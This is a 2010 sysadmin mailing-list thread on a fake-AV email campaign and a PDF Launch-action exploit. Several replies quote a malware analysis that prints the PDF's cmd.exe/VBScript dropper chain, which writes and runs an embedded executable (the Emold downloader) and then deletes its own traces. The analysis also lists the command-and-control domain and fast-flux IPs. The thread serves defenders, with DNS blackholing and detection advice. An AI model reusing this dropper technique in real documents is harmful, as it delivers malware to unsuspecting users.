Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
Amusingly, just got an ad from Adobe which encourages us to Interact with recipients by sending out PDF forms http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT Brian MCSE and stuff snip ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/ ~
RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
A couple of my users got a fake spam / virus alert email overnight that really contained a malware payload. I saved the zipped attachment out and scanned it with Vipre, but it didn't find anything until I tried to extract the contents of the zip file. John-AldrichTile-Tools From: Brian Richards [mailto:locomotive_breath_...@yahoo.com] Sent: Thursday, April 29, 2010 9:19 AM To: NT System Admin Issues Subject: Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds. Amusingly, just got an ad from Adobe which encourages us to Interact with recipients by sending out PDF forms http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT Brian MCSE and stuff snip ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/ ~image001.jpgimage002.jpg
Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
Someone in marketing failed. Sent from my BlackBerry® smartphone with Nextel Direct Connect -Original Message- From: Brian Richards locomotive_breath_...@yahoo.com Date: Thu, 29 Apr 2010 06:18:52 To: NT System Admin Issuesntsysadmin@lyris.sunbelt-software.com Subject: Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds. Amusingly, just got an ad from Adobe which encourages us to Interact with recipients by sending out PDF forms http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT Brian MCSE and stuff snip ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/ ~ ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/ ~
RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
Gang there is another PDF exploit going on that may or may not be hitting your places: Credit to Secureworks (tm) for the writeup below. See below: Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 127.0.0.1, and clear the cache on your DNS servers accordingly. Which should blackhole the zone. Note this is a fast-flux domain, as you can see from the different dns returns on nslookup. Also scan all your PDF files, some of the major AV vendors are picking this up and its packed exploit. jademason.com Server: xx.xx.xx.xx Address: xx.xx.xx.xx Non-authoritative answer: Name:jademason.com Addresses: 190.184.91.252 89.76.186.112 178.24.184.230 190.165.141.141 190.160.133.173 89.103.178.41 78.90.2.123 89.74.43.46 About 5 mins later: Non-authoritative answer: Name:jademason.com Addresses: 201.174.208.101 89.135.159.78 94.246.125.4 190.184.91.252 201.241.102.230 89.74.43.46 92.230.71.40 201.132.99.207 From: notificati...@yyybank.com [mailto:notificati...@yyybank.com] Sent: Tuesday, April 27, 2010 7:47 AM To: x...@bank.com Subject: setting for your mailbox are changed SMTP and POP3 servers for x...@yyybank.com mailbox are changed. Please carefully read the attached instructions before updating settings. It contained a file called doc.pdf. That file was, of course, malicious in nature. It used the PDF Launch vulnerability to run echo some commands into a bat file and then bootstrap itself to running the Emold downloader trojan. Let's take a look. 8 0 obj /Type /Action /S /Launch /Win /F (cmd.exe) /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject) script.vbs echo Set f=fso.OpenTextFile(doc.pdf, 1, True) script.vbs echo pf=f.ReadAll script.vbs echo s=InStr(pf,'SS) script.vbs echo e=InStr(pf,'EE) script.vbs echo s=Mid(pf,s,e-s) script.vbs echo Set z=fso.OpenTextFile(batscript.vbs, 2, True) script.vbs echo s = Replace(s,%,) script.vbs echo z.Write(s) script.vbs script.vbs batscript.vbs This uses cmd.exe to write some lines of text to a file called script.vbs and then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up: Set fso=CreateObject(Scripting.FileSystemObject) Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo s=InStr(pf,'SS) echo e=InStr(pf,'EE) s=Mid(pf,s,e-s) Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,) z.Write(s) When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to mark the beginning and end of a section of the pdf. It grabs that section, does a little bit of text manipulation and then writes the result to batscript.vbs. Next let's look what's in that tagged section of doc.pdf (that ends up batscript.vbs): 5 0 obj /Length 46 stream BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj %'SS %Dim b %Function c(d) %c=chr(d) %End Function %b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000), c(004),c(000),c(000)... ...this line is 248413 characters long... ...c(000),c(000),c(000),c(000 ),) %Set fso = CreateObject(Scripting.FileSystemObject) %Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328 %f.write(b(i)) %Next %f.close() %Set WshShell = WScript.CreateObject(WScript.Shell) %WshShell.Run cmd.exe /c game.exe %WScript.Sleep 3000 %Set f = FSO.GetFile(game.exe) %f.Delete %Set f = FSO.GetFile(batscript.vbs) %f.Delete %Set f = FSO.GetFile(script.vbs) %f.Delete %'EE endstream We can now see that the array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs. Game.exe is the Elmod trojan. This is a generic downloader which can be used to install any number of second stage trojans. It can be identified by the presence of the file C:/Program Files/Microsoft Common/svchost.exe, the registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, and because it phones home to (currently) jademason.com. Adobe has said that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, they intended to take to mitigate the danger. Their post on the matter does include directions for turning off this functionality. Edward Ziots CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization 401-639-3505 ezi...@lifespan.org -Original Message- From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] Sent: Wednesday, April 28, 2010 4:17 PM To: NT System Admin Issues Subject: RE: WTF? Fake AV Erm, There are 115 known strains (and growing fast) of malware for the Mac. That's why we are releasing a VIPRE client for the Mac in Q2. They have sold
RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
Thanks, Z! Sean Rector, MCSE -Original Message- From: Ziots, Edward [mailto:ezi...@lifespan.org] Sent: Wednesday, April 28, 2010 4:50 PM To: NT System Admin Issues Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds. Gang there is another PDF exploit going on that may or may not be hitting your places: Credit to Secureworks (tm) for the writeup below. See below: Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 127.0.0.1, and clear the cache on your DNS servers accordingly. Which should blackhole the zone. Note this is a fast-flux domain, as you can see from the different dns returns on nslookup. Also scan all your PDF files, some of the major AV vendors are picking this up and its packed exploit. jademason.com Server: xx.xx.xx.xx Address: xx.xx.xx.xx Non-authoritative answer: Name:jademason.com Addresses: 190.184.91.252 89.76.186.112 178.24.184.230 190.165.141.141 190.160.133.173 89.103.178.41 78.90.2.123 89.74.43.46 About 5 mins later: Non-authoritative answer: Name:jademason.com Addresses: 201.174.208.101 89.135.159.78 94.246.125.4 190.184.91.252 201.241.102.230 89.74.43.46 92.230.71.40 201.132.99.207 From: notificati...@yyybank.com [mailto:notificati...@yyybank.com] Sent: Tuesday, April 27, 2010 7:47 AM To: x...@bank.com Subject: setting for your mailbox are changed SMTP and POP3 servers for x...@yyybank.com mailbox are changed. Please carefully read the attached instructions before updating settings. It contained a file called doc.pdf. That file was, of course, malicious in nature. It used the PDF Launch vulnerability to run echo some commands into a bat file and then bootstrap itself to running the Emold downloader trojan. Let's take a look. 8 0 obj /Type /Action /S /Launch /Win /F (cmd.exe) /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject) script.vbs echo Set f=fso.OpenTextFile(doc.pdf, 1, True) script.vbs echo pf=f.ReadAll script.vbs echo s=InStr(pf,'SS) script.vbs echo e=InStr(pf,'EE) script.vbs echo s=Mid(pf,s,e-s) script.vbs echo Set z=fso.OpenTextFile(batscript.vbs, 2, True) script.vbs echo s = Replace(s,%,) script.vbs echo z.Write(s) script.vbs script.vbs batscript.vbs This uses cmd.exe to write some lines of text to a file called script.vbs and then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up: Set fso=CreateObject(Scripting.FileSystemObject) Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo s=InStr(pf,'SS) echo e=InStr(pf,'EE) s=Mid(pf,s,e-s) Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,) z.Write(s) When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to mark the beginning and end of a section of the pdf. It grabs that section, does a little bit of text manipulation and then writes the result to batscript.vbs. Next let's look what's in that tagged section of doc.pdf (that ends up batscript.vbs): 5 0 obj /Length 46 stream BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj %'SS %Dim b %Function c(d) %c=chr(d) %End Function %b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000), c(004),c(000),c(000)... ...this line is 248413 characters long... ...c(000),c(000),c(000),c(000 ),) %Set fso = CreateObject(Scripting.FileSystemObject) %Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328 %f.write(b(i)) %Next %f.close() %Set WshShell = WScript.CreateObject(WScript.Shell) %WshShell.Run cmd.exe /c game.exe %WScript.Sleep 3000 %Set f = FSO.GetFile(game.exe) %f.Delete %Set f = FSO.GetFile(batscript.vbs) %f.Delete %Set f = FSO.GetFile(script.vbs) %f.Delete %'EE endstream We can now see that the array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs. Game.exe is the Elmod trojan. This is a generic downloader which can be used to install any number of second stage trojans. It can be identified by the presence of the file C:/Program Files/Microsoft Common/svchost.exe, the registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, and because it phones home to (currently) jademason.com. Adobe has said that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, they intended to take to mitigate the danger. Their post on the matter does include directions for turning off this functionality. Edward Ziots CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization 401-639-3505 ezi...@lifespan.org -Original Message- From: Stu Sjouwerman [mailto:s...@sunbelt-software.com
RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.
We will be releasing a detection for this PDF exploit in a couple of hours. Warm regards, Stu Sjouwerman Co-Founder, Publisher, Sunbelt Media P: +1-727-562-0101 ext 218 F: +1-727-562-5199 s...@sunbelt-software.com -Original Message- From: Sean Rector [mailto:sean.rec...@vaopera.org] Sent: Wednesday, April 28, 2010 5:07 PM To: NT System Admin Issues Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds. Thanks, Z! Sean Rector, MCSE -Original Message- From: Ziots, Edward [mailto:ezi...@lifespan.org] Sent: Wednesday, April 28, 2010 4:50 PM To: NT System Admin Issues Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds. Gang there is another PDF exploit going on that may or may not be hitting your places: Credit to Secureworks (tm) for the writeup below. See below: Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 127.0.0.1, and clear the cache on your DNS servers accordingly. Which should blackhole the zone. Note this is a fast-flux domain, as you can see from the different dns returns on nslookup. Also scan all your PDF files, some of the major AV vendors are picking this up and its packed exploit. jademason.com Server: xx.xx.xx.xx Address: xx.xx.xx.xx Non-authoritative answer: Name:jademason.com Addresses: 190.184.91.252 89.76.186.112 178.24.184.230 190.165.141.141 190.160.133.173 89.103.178.41 78.90.2.123 89.74.43.46 About 5 mins later: Non-authoritative answer: Name:jademason.com Addresses: 201.174.208.101 89.135.159.78 94.246.125.4 190.184.91.252 201.241.102.230 89.74.43.46 92.230.71.40 201.132.99.207 From: notificati...@yyybank.com [mailto:notificati...@yyybank.com] Sent: Tuesday, April 27, 2010 7:47 AM To: x...@bank.com Subject: setting for your mailbox are changed SMTP and POP3 servers for x...@yyybank.com mailbox are changed. Please carefully read the attached instructions before updating settings. It contained a file called doc.pdf. That file was, of course, malicious in nature. It used the PDF Launch vulnerability to run echo some commands into a bat file and then bootstrap itself to running the Emold downloader trojan. Let's take a look. 8 0 obj /Type /Action /S /Launch /Win /F (cmd.exe) /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject) script.vbs echo Set f=fso.OpenTextFile(doc.pdf, 1, True) script.vbs echo pf=f.ReadAll script.vbs echo s=InStr(pf,'SS) script.vbs echo e=InStr(pf,'EE) script.vbs echo s=Mid(pf,s,e-s) script.vbs echo Set z=fso.OpenTextFile(batscript.vbs, 2, True) script.vbs echo s = Replace(s,%,) script.vbs echo z.Write(s) script.vbs script.vbs batscript.vbs This uses cmd.exe to write some lines of text to a file called script.vbs and then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up: Set fso=CreateObject(Scripting.FileSystemObject) Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo s=InStr(pf,'SS) echo e=InStr(pf,'EE) s=Mid(pf,s,e-s) Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,) z.Write(s) When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to mark the beginning and end of a section of the pdf. It grabs that section, does a little bit of text manipulation and then writes the result to batscript.vbs. Next let's look what's in that tagged section of doc.pdf (that ends up batscript.vbs): 5 0 obj /Length 46 stream BT /F1 34 Tf 50 500 Td (Important Information doc.pdf)Tj %'SS %Dim b %Function c(d) %c=chr(d) %End Function %b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000), c(004),c(000),c(000)... ...this line is 248413 characters long... ...c(000),c(000),c(000),c(000 ),) %Set fso = CreateObject(Scripting.FileSystemObject) %Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328 %f.write(b(i)) %Next %f.close() %Set WshShell = WScript.CreateObject(WScript.Shell) %WshShell.Run cmd.exe /c game.exe %WScript.Sleep 3000 %Set f = FSO.GetFile(game.exe) %f.Delete %Set f = FSO.GetFile(batscript.vbs) %f.Delete %Set f = FSO.GetFile(script.vbs) %f.Delete %'EE endstream We can now see that the array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs. Game.exe is the Elmod trojan. This is a generic downloader which can be used to install any number of second stage trojans. It can be identified by the presence of the file C:/Program Files/Microsoft Common/svchost.exe, the registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, and because it phones home to (currently) jademason.com. Adobe has said that the Launch
